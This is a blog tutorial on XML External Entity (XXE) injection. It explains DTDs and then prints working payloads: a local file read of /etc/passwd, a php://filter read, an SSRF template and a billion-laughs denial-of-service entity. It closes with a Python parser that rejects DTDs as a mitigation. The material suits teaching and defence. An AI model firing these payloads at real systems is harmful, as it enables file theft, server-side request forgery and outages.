Thursday, 17 January 2019

The Basics of XXE - XML External Entity attack.

One of the prime goals in web hacking is to get a backdoor and own the target, and XXE can help you achieve this. But before discussing XXE injection you must know the basics of XML. And yeah, memes are here to eradicate boredom.

According to Google, XML is a metalanguage which allows users to define their own customized markup languages, especially in order to display documents on the internet.

Some features of XML are:
  • It simplifies data transport and sharing
  • It simplifies platform changes
  • It increases data availability

well, XML is boring but...

What is DTD?
DTD stands for Document Type Definition. It defines the structure, the legal elements and the attributes of an XML document.

A DTD is used to verify whether XML data is valid or not. A DTD can be declared either internally or externally.

Internal Declaration of DTD
Inside the XML file, the DTD is wrapped in a <!DOCTYPE> definition. Here is an example from w3schools:

NOTE: In a raw XML file you can view the DTD with the view-source feature.

Let's break down this code snippet.

  • <!DOCTYPE note defines that the root element of this document is note.
  • <!ELEMENT note defines that the element note contains four other elements: to, from, heading and body.
  • <!ELEMENT to (#PCDATA)> (and likewise for from, heading and body) defines the element to be of type #PCDATA.

External Declaration of DTD
If the DTD is declared in an external file, then the <!DOCTYPE> definition must contain the URI of the DTD file.

Here is another code snippet from w3schools:

And here is the external file which contains the DTD:

#PCDATA stands for parsed character data.

What are DTD Entities?
Entities are used to define shortcuts for special characters.

For declaration types and more information, please consider reading this:

Now that's a lot of XML. Let's get back to the main topic: XXE injection.

Who is affected by XXE?
Well, lots of apps use XML, configuration files use XML, many protocols rely on XML, and some applications use it without even knowing it.

What can we exploit with XXE?
Well, we can exploit XXE in various places, including:

  • Local File Inclusion

    <?xml version="1.0"?>
    <!DOCTYPE foo [
    <!ELEMENT foo ANY>
    <!ENTITY xxe SYSTEM "file:///etc/passwd">]><foo>&xxe;</foo>

  • Access Control Bypass

    <?xml version="1.0"?>
    <!DOCTYPE foo [
    <!ENTITY ac SYSTEM "php://filter/read=convert.base64-encode/resource=">]>

  • SSRF

    <?xml version="1.0"?>
    <!DOCTYPE foo [
    <!ELEMENT foo ANY>
    <!ENTITY xxe SYSTEM "">]><foo>&xxe;</foo>

  • Denial of Service (the "billion laughs" entity expansion)

    <?xml version="1.0"?>
    <!DOCTYPE lolz [
    <!ENTITY lol "lol">
    <!ELEMENT lolz (#PCDATA)>
    <!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
    <!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
    <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
    <!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
    <!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
    <!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
    <!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
    <!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
    <!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
How to exploit XXE?
Here is a short 2 minute video demonstrating how to exploit XXE using Burp Suite.

How to mitigate XXE?
The best and easiest way to mitigate XXE is to disable external entity (DTD) processing in the parser, and a lot of parsers already do this by default.
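As an added example (not code from the original post), here is what that mitigation looks like when a parser does not do it for you: a small parser built on Python's standard-library expat bindings that refuses any DOCTYPE before the internal subset is read. Every payload class listed above (file read, php://filter, SSRF, billion laughs) needs a DTD to declare its entity, so this one check blocks all of them; the sample inputs are constructed for the demo.

```python
import xml.parsers.expat

class UnsafeXMLError(ValueError):
    """Raised when untrusted XML carries a DTD or references an external entity."""

def parse_untrusted_xml(data: str) -> dict:
    """Parse untrusted XML with DTDs refused; returns {element path: leaf text}.
    The DOCTYPE is rejected before its internal subset (and any <!ENTITY>) is read.
    """
    result, stack, text = {}, [], []

    def reject_doctype(name, sysid, pubid, has_internal_subset):
        raise UnsafeXMLError(f"DOCTYPE {name!r} refused in untrusted input")

    def reject_external_entity(context, base, sysid, pubid):
        # Defence in depth: never fetch a SYSTEM URI even if a DTD got through.
        raise UnsafeXMLError(f"external entity {sysid!r} refused")

    def start(name, attrs):
        stack.append(name)
        text.clear()

    def end(name):
        leaf = "".join(text).strip()
        if leaf:
            result["/".join(stack)] = leaf
        stack.pop()
        text.clear()

    p = xml.parsers.expat.ParserCreate()
    p.StartDoctypeDeclHandler = reject_doctype
    p.ExternalEntityRefHandler = reject_external_entity
    p.StartElementHandler = start
    p.EndElementHandler = end
    p.CharacterDataHandler = text.append
    p.Parse(data, True)
    return result

def is_rejected(data: str) -> bool:
    """True if parse_untrusted_xml refuses the document as unsafe."""
    try:
        parse_untrusted_xml(data)
    except UnsafeXMLError:
        return True
    return False

# Constructed sample inputs: a benign note and two payloads of the kinds shown above.
BENIGN_NOTE = "<note><to>Tove</to><from>Jani</from></note>"
FILE_READ_PAYLOAD = '<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><foo>&xxe;</foo>'
BILLION_LAUGHS = '<!DOCTYPE lolz [<!ENTITY lol "lol"><!ENTITY lol1 "&lol;&lol;&lol;">]><lolz>&lol1;</lolz>'
```

Rejecting the DOCTYPE outright is the simplest safe policy for input that should never carry a DTD; if your application legitimately needs a DTD, the same handlers can be narrowed to refuse only entity declarations.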

And here we end our tutorial. Thank you so much for reading, guys; below are the links for further reading, check them out for sure.
